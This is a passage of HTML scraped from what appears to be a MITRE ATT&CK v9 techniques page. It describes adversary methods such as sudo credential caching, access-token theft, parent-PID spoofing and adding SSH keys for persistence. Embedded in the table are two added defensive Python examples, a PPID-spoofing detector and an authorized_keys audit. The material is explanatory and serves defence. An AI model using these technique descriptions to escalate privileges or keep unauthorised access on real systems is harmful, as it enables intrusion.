Standard Encoding </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" 
id="enterprise-TA0011-T1132-T1132.002"> <a href="/versions/v9/techniques/T1132/002/"> Non-Standard Encoding </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011-T1001"> <a href="/versions/v9/techniques/T1001/"> Data Obfuscation </a> <div class="expand-button collapsed" id="enterprise-TA0011-T1001-header" data-toggle="collapse" data-target="#enterprise-TA0011-T1001-body" aria-expanded="false" aria-controls="#enterprise-TA0011-T1001-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-T1001-body" aria-labelledby="enterprise-TA0011-T1001-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1001-T1001.001"> <a href="/versions/v9/techniques/T1001/001/"> Junk Data </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1001-T1001.002"> <a href="/versions/v9/techniques/T1001/002/"> Steganography </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1001-T1001.003"> <a href="/versions/v9/techniques/T1001/003/"> Protocol Impersonation </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011-T1568"> <a href="/versions/v9/techniques/T1568/"> Dynamic Resolution </a> <div class="expand-button collapsed" id="enterprise-TA0011-T1568-header" data-toggle="collapse" data-target="#enterprise-TA0011-T1568-body" aria-expanded="false" aria-controls="#enterprise-TA0011-T1568-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-T1568-body" aria-labelledby="enterprise-TA0011-T1568-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1568-T1568.001"> <a href="/versions/v9/techniques/T1568/001/"> Fast Flux DNS </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1568-T1568.002"> <a href="/versions/v9/techniques/T1568/002/"> Domain Generation Algorithms </a> </div> </div> <div 
class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1568-T1568.003"> <a href="/versions/v9/techniques/T1568/003/"> DNS Calculation </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011-T1573"> <a href="/versions/v9/techniques/T1573/"> Encrypted Channel </a> <div class="expand-button collapsed" id="enterprise-TA0011-T1573-header" data-toggle="collapse" data-target="#enterprise-TA0011-T1573-body" aria-expanded="false" aria-controls="#enterprise-TA0011-T1573-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-T1573-body" aria-labelledby="enterprise-TA0011-T1573-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1573-T1573.001"> <a href="/versions/v9/techniques/T1573/001/"> Symmetric Cryptography </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1573-T1573.002"> <a href="/versions/v9/techniques/T1573/002/"> Asymmetric Cryptography </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1008"> <a href="/versions/v9/techniques/T1008/"> Fallback Channels </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1105"> <a href="/versions/v9/techniques/T1105/"> Ingress Tool Transfer </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1104"> <a href="/versions/v9/techniques/T1104/"> Multi-Stage Channels </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1095"> <a href="/versions/v9/techniques/T1095/"> Non-Application Layer Protocol </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1571"> <a href="/versions/v9/techniques/T1571/"> Non-Standard Port </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1572"> <a href="/versions/v9/techniques/T1572/"> Protocol Tunneling </a> </div> </div> <div 
class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011-T1090"> <a href="/versions/v9/techniques/T1090/"> Proxy </a> <div class="expand-button collapsed" id="enterprise-TA0011-T1090-header" data-toggle="collapse" data-target="#enterprise-TA0011-T1090-body" aria-expanded="false" aria-controls="#enterprise-TA0011-T1090-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-T1090-body" aria-labelledby="enterprise-TA0011-T1090-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1090-T1090.001"> <a href="/versions/v9/techniques/T1090/001/"> Internal Proxy </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1090-T1090.002"> <a href="/versions/v9/techniques/T1090/002/"> External Proxy </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1090-T1090.003"> <a href="/versions/v9/techniques/T1090/003/"> Multi-hop Proxy </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1090-T1090.004"> <a href="/versions/v9/techniques/T1090/004/"> Domain Fronting </a> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1219"> <a href="/versions/v9/techniques/T1219/"> Remote Access Software </a> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011-T1205"> <a href="/versions/v9/techniques/T1205/"> Traffic Signaling </a> <div class="expand-button collapsed" id="enterprise-TA0011-T1205-header" data-toggle="collapse" data-target="#enterprise-TA0011-T1205-body" aria-expanded="false" aria-controls="#enterprise-TA0011-T1205-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-T1205-body" aria-labelledby="enterprise-TA0011-T1205-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1205-T1205.001"> <a href="/versions/v9/techniques/T1205/001/"> Port Knocking </a> </div> </div> </div> </div> <div 
class="sidenav"> <div class="sidenav-head " id="enterprise-TA0011-T1102"> <a href="/versions/v9/techniques/T1102/"> Web Service </a> <div class="expand-button collapsed" id="enterprise-TA0011-T1102-header" data-toggle="collapse" data-target="#enterprise-TA0011-T1102-body" aria-expanded="false" aria-controls="#enterprise-TA0011-T1102-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0011-T1102-body" aria-labelledby="enterprise-TA0011-T1102-header"> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1102-T1102.001"> <a href="/versions/v9/techniques/T1102/001/"> Dead Drop Resolver </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1102-T1102.002"> <a href="/versions/v9/techniques/T1102/002/"> Bidirectional Communication </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="enterprise-TA0011-T1102-T1102.003"> <a href="/versions/v9/techniques/T1102/003/"> One-Way Communication </a> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0010"> <a href="/versions/v9/tactics/TA0010"> Exfiltration </a> <div class="expand-button collapsed" id="enterprise-TA0010-header" data-toggle="collapse" data-target="#enterprise-TA0010-body" aria-expanded="false" aria-controls="#enterprise-TA0010-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0010-body" aria-labelledby="enterprise-TA0010-header"> <div class="sidenav"> <div class="sidenav-head " id="enterprise-TA0010-T1020"> <a href="/versions/v9/techniques/T1020/"> Automated Exfiltration </a> <div class="expand-button collapsed" id="enterprise-TA0010-T1020-header" data-toggle="collapse" data-target="#enterprise-TA0010-T1020-body" aria-expanded="false" aria-controls="#enterprise-TA0010-T1020-body"></div> </div> <div class="sidenav-body collapse" id="enterprise-TA0010-T1020-body" aria-labelledby="enterprise-TA0010-T1020-header"> <div class="sidenav"> <div 
class="sidenav-head" id="enterprise-TA0010-T1020-T1020.001"> <a href="/versions/v9/techniques/T1020/001/"> Traffic Duplication </a> </div> </div> </div> </div> </div> </div> </div> </div> <div class="sidenav"> <div class="sidenav-head " id="mobile"> <a href="/versions/v9/techniques/mobile/"> Mobile </a> <div class="expand-button collapsed" id="mobile-header" data-toggle="collapse" data-target="#mobile-body" aria-expanded="false" aria-controls="#mobile-body"></div> </div> <div class="sidenav-body collapse" id="mobile-body" aria-labelledby="mobile-header"> <div class="sidenav"> <div class="sidenav-head " id="mobile-TA0039"> <a href="/versions/v9/tactics/TA0039"> Remote Service Effects </a> <div class="expand-button collapsed" id="mobile-TA0039-header" data-toggle="collapse" data-target="#mobile-TA0039-body" aria-expanded="false" aria-controls="#mobile-TA0039-body"></div> </div> <div class="sidenav-body collapse" id="mobile-TA0039-body" aria-labelledby="mobile-TA0039-header"> <div class="sidenav"> <div class="sidenav-head" 
id="mobile-TA0039-T1470"> <a href="/versions/v9/techniques/T1470/"> Obtain Device Cloud Backups </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0039-T1468"> <a href="/versions/v9/techniques/T1468/"> Remotely Track Device Without Authorization </a> </div> </div> <div class="sidenav"> <div class="sidenav-head" id="mobile-TA0039-T1469"> <a href="/versions/v9/techniques/T1469/"> Remotely Wipe Data Without Authorization </a> </div> </div> </div> </div> </div> </div> </div> <!--start-indexing-for-search--> </div> <div class="tab-content col-xl-10 col-lg-9 col-md-9 pt-4" id="v-tabContent"> <div class="tab-pane fade show active" id="v-attckmatrix" role="tabpanel" aria-labelledby="v-attckmatrix-tab"> <div class="tab-pane fade show active" id="v-" role="tabpanel" aria-labelledby="v--tab"></div> <div class="row"> <div class="col-xl-12"> <div class="jumbotron jumbotron-fluid"> <div class="container-fluid"> <div class="overflow-x-auto"> <div class="row"> <div class="col-md-8"> <h1> Enterprise Techniques </h1> </div> <div class="col-md-4"> <div class="row table-object-count pr-3"> <h6>Techniques: 185</h6> </div> <div class="row table-object-count pr-3"> <h6>Sub-techniques: 367</h6> </div> </div> </div> <table class="table-techniques"> <thead> <tr> <td colspan="2">ID</td> <td>Name</td> <td>Description</td> </tr> </thead> <tbody> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1548"> T1548 </a> </td> <td> <a href="/versions/v9/techniques/T1548"> Abuse Elevation Control Mechanism </a> </td> <td> Adversaries may circumvent mechanisms designed to control elevated privileges to gain higher-level permissions. 
Most modern systems contain native elevation control mechanisms that are intended to limit the privileged actions a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that are considered higher risk. An adversary can use several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1548/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1548/001"> Setuid and Setgid </a> </td> <td> An adversary may perform shell escapes or exploit vulnerabilities in an application with the setuid or setgid bit set to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bit is set on an executable, it runs with the privileges of the owning user or group respectively. Normally an application runs in the current user’s context, regardless of which user or group owns it. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1548/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1548/002"> Bypass User Account Control </a> </td> <td> Adversaries may bypass UAC mechanisms to elevate process privileges on a system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. 
The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1548/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1548/003"> Sudo and Sudo Caching </a> </td> <td> Adversaries may abuse sudo's credential caching and/or the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges. sudo caches a successful authentication for <code>timestamp_timeout</code> minutes (5 by default), and with <code>tty_tickets</code> disabled that cached credential is shared across all of the user's terminals, so any code running as that user can reuse it. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1548/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1548/004"> Elevated Execution with Prompt </a> </td> <td> Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to escalate privileges by prompting the user for credentials. The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has not been maliciously modified. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1134"> T1134 </a> </td> <td> <a href="/versions/v9/techniques/T1134"> Access Token Manipulation </a> </td> <td> Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. 
When this occurs, the process also takes on the security context associated with the new token. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1134/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1134/001"> Token Impersonation/Theft </a> </td> <td> Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using <code>DuplicateToken(Ex)</code>. The token can then be used with <code>ImpersonateLoggedOnUser</code> to allow the calling thread to impersonate a logged on user's security context, or with <code>SetThreadToken</code> to assign the impersonated token to a thread. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1134/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1134/002"> Create Process with Token </a> </td> <td> Adversaries may create a new process with a duplicated token to escalate privileges and bypass access controls. An adversary can duplicate a desired access token with <code>DuplicateToken(Ex)</code> and use it with <code>CreateProcessWithTokenW</code> to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1134/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1134/003"> Make and Impersonate Token </a> </td> <td> Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the <code>LogonUser</code> function. 
The function will return a copy of the new session's access token and the adversary can use <code>SetThreadToken</code> to assign the token to a thread. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1134/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1134/004"> Parent PID Spoofing </a> </td> <td> Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which accepts a <code>PROC_THREAD_ATTRIBUTE_PARENT_PROCESS</code> attribute in its extended startup information that defines the PPID to use. This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1134/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1134/005"> SID-History Injection </a> </td> <td> Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. An account can hold additional SIDs in the SID-History Active Directory attribute, allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens). 
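The parent/creator mismatch that Parent PID Spoofing (.004) relies on is also what gives it away. The following detector is an added example written for this page, not MITRE or ATT&CK code: it assumes process-creation telemetry that records both the parent PID stored in the child and the PID of the process that actually called CreateProcess (field names and all sample events are constructed), and it excludes the UAC broker case described above.

```python
"""Detect Parent PID spoofing (T1134.004) from process-creation telemetry.

Added example; not MITRE or ATT&CK code. It assumes telemetry that records two
parent-related fields per process start: the parent PID stored in the new
process (what Task Manager and most tools display, and what a caller can choose
via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS) and the PID of the process that
actually called CreateProcess (e.g. the ETW event header's ProcessId, or an EDR
"creator" field). Field names and all events below are constructed.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    ppid: int           # parent recorded in the child; attacker-controllable
    parent_image: str
    creator_pid: int    # process whose thread issued CreateProcess; kernel-observed
    creator_image: str


# Windows components that legitimately launch an elevated process on behalf of a
# requester and re-parent it to that requester (the UAC case in the text above).
UAC_BROKERS = {"svchost.exe", "consent.exe"}


def basename(path: str) -> str:
    """Last path component, lower-cased, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_ppid_spoofing(events):
    """Return one finding per event whose recorded parent differs from its
    creator, unless the creator is a UAC broker."""
    findings = []
    for ev in events:
        if ev.ppid == ev.creator_pid:
            continue
        if basename(ev.creator_image) in UAC_BROKERS:
            continue  # expected re-parenting after a UAC elevation
        findings.append({
            "pid": ev.pid,
            "image": basename(ev.image),
            "claimed_parent": f"{basename(ev.parent_image)}:{ev.ppid}",
            "actual_creator": f"{basename(ev.creator_image)}:{ev.creator_pid}",
        })
    return findings


# Constructed sample telemetry, not real data.
SAMPLE_EVENTS = [
    # Normal: explorer.exe (1200) starts cmd.exe itself.
    ProcEvent(4412, r"C:\Windows\System32\cmd.exe",
              1200, r"C:\Windows\explorer.exe",
              1200, r"C:\Windows\explorer.exe"),
    # Legitimate UAC elevation: the AppInfo service (svchost.exe, 880) creates
    # the elevated process but records explorer.exe as its parent.
    ProcEvent(7010, r"C:\Windows\System32\cmd.exe",
              1200, r"C:\Windows\explorer.exe",
              880, r"C:\Windows\System32\svchost.exe"),
    # Spoofed: powershell.exe (4890) creates notepad.exe but claims explorer.exe
    # as the parent.
    ProcEvent(5120, r"C:\Windows\System32\notepad.exe",
              1200, r"C:\Windows\explorer.exe",
              4890, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
]

if __name__ == "__main__":
    for finding in find_ppid_spoofing(SAMPLE_EVENTS):
        print(finding)
```

The broker allowlist is a noise filter, not a trust boundary: an adversary already executing inside svchost.exe would pass it, so pair this check with image-path and command-line inspection of the creator rather than relying on the name alone.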
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1531"> T1531 </a> </td> <td> <a href="/versions/v9/techniques/T1531"> Account Access Removal </a> </td> <td> Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1087"> T1087 </a> </td> <td> <a href="/versions/v9/techniques/T1087"> Account Discovery </a> </td> <td> Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1087/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1087/001"> Local Account </a> </td> <td> Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1087/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1087/002"> Domain Account </a> </td> <td> Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1087/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1087/003"> Email Account </a> </td> <td> Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs). 
</td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1087/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1087/004"> Cloud Account </a> </td> <td> Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1098"> T1098 </a> </td> <td> <a href="/versions/v9/techniques/T1098"> Account Manipulation </a> </td> <td> Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1098/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1098/001"> Additional Cloud Credentials </a> </td> <td> Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1098/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1098/002"> Exchange Email Delegate Permissions </a> </td> <td> Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. 
The <code>Add-MailboxPermission</code> <a href="/versions/v9/techniques/T1059/001">PowerShell</a> cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1098/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1098/003"> Add Office 365 Global Administrator Role </a> </td> <td> An adversary may add the Global Administrator role to an adversary-controlled account to maintain persistent access to an Office 365 tenant. With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins) via the global admin role. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1098/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1098/004"> SSH Authorized Keys </a> </td> <td> Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure SSH sessions for remote management. The <code>authorized_keys</code> file specifies the SSH public keys that can be used to log into the user account for which the file is configured. This file is usually found in the user's home directory under <code>&lt;user-home&gt;/.ssh/authorized_keys</code>. Users may edit the SSH daemon configuration, usually <code>/etc/ssh/sshd_config</code>, to set the directives <code>PubkeyAuthentication</code> and <code>RSAAuthentication</code> to "yes" to ensure public key authentication is enabled (<code>PubkeyAuthentication</code> defaults to yes; <code>RSAAuthentication</code> is a legacy protocol-1 directive that current OpenSSH releases no longer honor). The same file's <code>AuthorizedKeysFile</code> directive controls where sshd looks for keys, so changes to it deserve the same scrutiny as changes to the key file itself. 
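As an added example (not MITRE's or OpenSSH's code), the following audit parses an <code>authorized_keys</code> file the way the entry above describes, derives each key's SHA256 fingerprint, and reports keys that are malformed or not on an operator-maintained allowlist. The sample file, the allowlist and the 32-byte key material are constructed; the fingerprint and wire-format rules follow OpenSSH.

```python
"""Audit an SSH authorized_keys file against a fingerprint allowlist (T1098.004).

Added example; not MITRE or ATT&CK code. Parses the authorized_keys line format
(optional comma-separated options that may contain quoted commas and spaces,
then key type, base64 key blob and optional comment), computes the SHA256
fingerprint that `ssh-keygen -lf` prints for the blob, and reports keys that
are malformed or not on the allowlist. The keys, file and allowlist below are
constructed; the 32-byte public keys are filler, not real key material.
"""
import base64
import hashlib
import struct

KEY_TYPES = {"ssh-ed25519", "ssh-rsa", "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384",
             "ecdsa-sha2-nistp521", "sk-ssh-ed25519@openssh.com",
             "sk-ecdsa-sha2-nistp256@openssh.com"}


def split_options(line):
    """Return (options, rest). Options end at the first unquoted whitespace;
    a line whose first token is a key type has no options."""
    if line.split(None, 1)[0] in KEY_TYPES:
        return "", line
    in_quote = False
    for i, ch in enumerate(line):
        if ch == '"' and (i == 0 or line[i - 1] != "\\"):
            in_quote = not in_quote
        elif ch.isspace() and not in_quote:
            return line[:i], line[i:].lstrip()
    return line, ""


def fingerprint(blob: bytes) -> str:
    """OpenSSH-style fingerprint: SHA256 of the wire blob, base64 without padding."""
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def embedded_type(blob: bytes) -> str:
    """First length-prefixed string of the blob, which names the key type."""
    (n,) = struct.unpack(">I", blob[:4])
    return blob[4:4 + n].decode("ascii", "replace")


def parse_authorized_keys(text):
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        options, rest = split_options(line)
        parts = rest.split(None, 2)
        if len(parts) < 2:
            entries.append({"line": lineno, "error": "missing key type or blob"})
            continue
        try:
            blob = base64.b64decode(parts[1], validate=True)
            etype = embedded_type(blob)
        except (ValueError, struct.error):
            entries.append({"line": lineno, "error": "undecodable key blob"})
            continue
        entries.append({"line": lineno, "options": options, "type": parts[0],
                        "embedded_type": etype, "fingerprint": fingerprint(blob),
                        "comment": parts[2] if len(parts) == 3 else ""})
    return entries


def audit(text, allowlist):
    """Return (line, kind, detail) tuples for anything an operator should review."""
    findings = []
    for e in parse_authorized_keys(text):
        if "error" in e:
            findings.append((e["line"], "malformed", e["error"]))
            continue
        if e["type"] != e["embedded_type"]:
            findings.append((e["line"], "malformed",
                             f"declared {e['type']} but blob is {e['embedded_type']}"))
        if e["fingerprint"] not in allowlist:
            detail = f"{e['fingerprint']} options={e['options'] or '-'} {e['comment']}"
            findings.append((e["line"], "unknown-key", detail.strip()))
    return findings


# Constructed sample data: build ed25519 blobs in OpenSSH wire format.
def ssh_string(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def make_ed25519_blob(pub32: bytes) -> bytes:
    return ssh_string(b"ssh-ed25519") + ssh_string(pub32)


ADMIN_BLOB = make_ed25519_blob(bytes(range(32)))     # filler, not a real key
ROGUE_BLOB = make_ed25519_blob(bytes([0xAB] * 32))   # filler, not a real key
b64 = lambda b: base64.b64encode(b).decode()

SAMPLE_FILE = f"""# constructed ~/.ssh/authorized_keys
ssh-ed25519 {b64(ADMIN_BLOB)} alice@laptop
from="10.0.0.0/8",command="/usr/bin/rsync --server, -a . /backup" ssh-ed25519 {b64(ROGUE_BLOB)} backup
"""
ALLOWLIST = {fingerprint(ADMIN_BLOB)}   # fingerprints the operator has approved
```

Run <code>audit(SAMPLE_FILE, ALLOWLIST)</code> to list the findings; in practice the allowlist is built from fingerprints collected at provisioning time, and the same parser can be pointed at every path named by <code>AuthorizedKeysFile</code> in <code>sshd_config</code>.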
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1583"> T1583 </a> </td> <td> <a href="/versions/v9/techniques/T1583"> Acquire Infrastructure </a> </td> <td> Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Additionally, botnets are available for rent or purchase. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1583/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1583/001"> Domains </a> </td> <td> Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1583/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1583/002"> DNS Server </a> </td> <td> Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: <a href="/versions/v9/techniques/T1071">Application Layer Protocol</a>). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1583/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1583/003"> Virtual Private Server </a> </td> <td> Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. 
By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1583/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1583/004"> Server </a> </td> <td> Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party <a href="/versions/v9/techniques/T1584/004">Server</a> or renting a <a href="/versions/v9/techniques/T1583/003">Virtual Private Server</a>, adversaries may opt to configure and run their own servers in support of operations. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1583/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1583/005"> Botnet </a> </td> <td> Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks. Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale <a href="/versions/v9/techniques/T1566">Phishing</a> or Distributed Denial of Service (DDoS). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1583/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1583/006"> Web Services </a> </td> <td> Adversaries may register for web services that can be used during targeting. 
